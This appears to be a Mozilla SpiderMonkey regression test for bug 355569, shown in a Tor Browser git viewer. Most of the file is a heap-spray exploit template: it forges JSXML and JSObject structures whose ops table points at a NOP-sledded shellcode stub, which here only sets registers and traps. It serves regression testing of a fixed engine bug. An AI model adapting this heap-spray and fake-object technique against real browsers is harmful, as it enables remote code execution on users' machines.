tor-browser

The Tor Browser
git clone https://git.dasho.dev/tor-browser.git
Log | Files | Refs | README | LICENSE

regress-355569.js (4467B)

      1 /* -*- indent-tabs-mode: nil; js-indent-level: 4 -*- */
      2 
      3 /* This Source Code Form is subject to the terms of the Mozilla Public
      4 * License, v. 2.0. If a copy of the MPL was not distributed with this
      5 * file, You can obtain one at http://mozilla.org/MPL/2.0/. */
      6 
      7 var BUGNUMBER = 355569;
      8 var actual = '';
      9 var expect = '';
     10 var summary = '';
     11 
     12 printBugNumber (BUGNUMBER);
     13 printStatus (summary);
     14 
     15 var targetAddress = 0x12030010;
     16 var sprayParams = {
     17  chunkSize: 16 * 1024 * 1024,
     18  chunkCount: 16,
     19  chunkMarker: 0xdeadface,
     20  chunkAlign: 0x1000,
     21  reservedSize: 1024
     22 };
     23 
     24 function makeExploitCode() {
     25  /* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
     26  return "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
     27 }
     28 
     29 /*==========================================================================*/
     30 /*==========================================================================*/
     31 
     32 function packData(template, A) {
     33  var n = 0, result = "", vl;
     34  for(var i = 0; i < template.length; i++) {
     35    var ch = template.charAt(i);
     36    if(ch == "s" || ch == "S") {
     37      vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff);
     38    } else if(ch == "l" || ch == "L") { // XXX endian
     39      vl = A[n++] >>> 0; result += String.fromCharCode(vl & 0xffff, vl >> 16);
     40    } else if(ch == "=") {
     41      result += String(A[n++]);
     42    }
     43  }
     44  return result;
     45 }
     46 function buildStructure(worker, address) {
     47  var offs = {}, result = "", context = {
     48    append: function(k, v) { offs[k] = result.length * 2; result += v; },
     49    address: function(k) { return address + ((k && offs[k]) || 0); }
     50  }; worker(context); result = ""; worker(context); return result;
     51 }
     52 function repeatToLength(s, L) {
     53  if(L <= s.length) { return s.substring(0, L); }
     54  while(s.length <= L/2) { s += s; }
     55  return s + s.substring(0, L - s.length);
     56 }
     57 function sprayData(data, params, rooter) {
     58  var marker = packData("L", [ params.chunkMarker ]);
     59  data += repeatToLength("\u9090", params.chunkAlign / 2 - data.length);
     60  data = repeatToLength(data, (params.chunkSize - params.reservedSize) / 2);
     61  for(var i = 0; i < params.chunkCount; i++) {
     62    rooter[i] = marker + data + i;
     63  }
     64 }
     65 
     66 function T_JSObject(map, slots)
     67 { return packData("LL", arguments); }
     68 function T_JSObjectMap(nrefs, ops, nslots, freeslot)
     69 { return packData("LLLL", arguments); }
     70 function T_JSObjectOps(
     71  newObjectMap, destroyObjectMap, lookupProperty, defineProperty,
     72  getProperty, setProperty, getAttributes, setAttributes,
     73  deleteProperty, defaultValue, enumerate, checkAccess,
     74  thisObject, dropProperty, call, construct,
     75  xdrObject, hasInstance, setProto, setParent,
     76  mark, clear, getRequiredSlot, setRequiredSlot
     77 ) { return packData("LLLLLLLL LLLLLLLL LLLLLLLL", arguments); }
     78 
     79 function T_JSXML_LIST(
     80  object, domnode, parent, name, xml_class, xml_flags,
     81  kids_length, kids_capacity, kids_vector, kids_cursors,
     82  xml_target, xml_targetprop
     83 ) { return packData("LLLLSS LLLL LL", arguments); }
     84 function T_JSXML_ELEMENT(
     85  object, domnode, parent, name, xml_class, xml_flags,
     86  kids_length, kids_capacity, kids_vector, kids_cursors,
     87  nses_length, nses_capacity, nses_vector, nses_cursors,
     88  atrs_length, atrs_capacity, atrs_vector, atrs_cursors
     89 ) { return packData("LLLLSS LLLL LLLL LLLL", arguments); }
     90 
     91 /*==========================================================================*/
     92 /*==========================================================================*/
     93 
     94 function makeExploitData(address) {
     95  return buildStructure(function(ctx) {
     96    ctx.append("xml-list",
     97      T_JSXML_LIST(0, 0, 0, 0, 0, 0, 1, 0, ctx.address("xml-kids-vector"), 0, 0, 0));
     98    ctx.append("xml-kids-vector",
     99      packData("L", [ ctx.address("xml-element") ]));
    100    ctx.append("xml-element",
    101      T_JSXML_ELEMENT(ctx.address("object"), 0, 0, 0, 1, 0, 0, 0, 0, 0, /*c*/ 0, 0, 0, 0, /*d*/ 0, 0, 0, 0));
    102    ctx.append("object",
    103      T_JSObject(ctx.address("object-map"), 0));
    104    ctx.append("object-map",
    105      T_JSObjectMap(0, ctx.address("object-ops"), 0, 0));
    106    ctx.append("object-ops",
    107      T_JSObjectOps(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ctx.address("exploit-code"), 0));
    108    ctx.append("exploit-code",
    109      makeExploitCode(ctx));
    110  }, address);
    111 }
    112 
    113 function exploit() {
    114  sprayData(makeExploitData(targetAddress), sprayParams, this.rooter = {});
    115  var numobj = new Number(targetAddress >> 1);
    116  printStatus("probably not exploitable");
    117 }
    118 
    119 try
    120 {
    121    exploit();
    122 }
    123 catch(ex)
    124 {
    125 }
    126 
    127 reportCompare(expect, actual);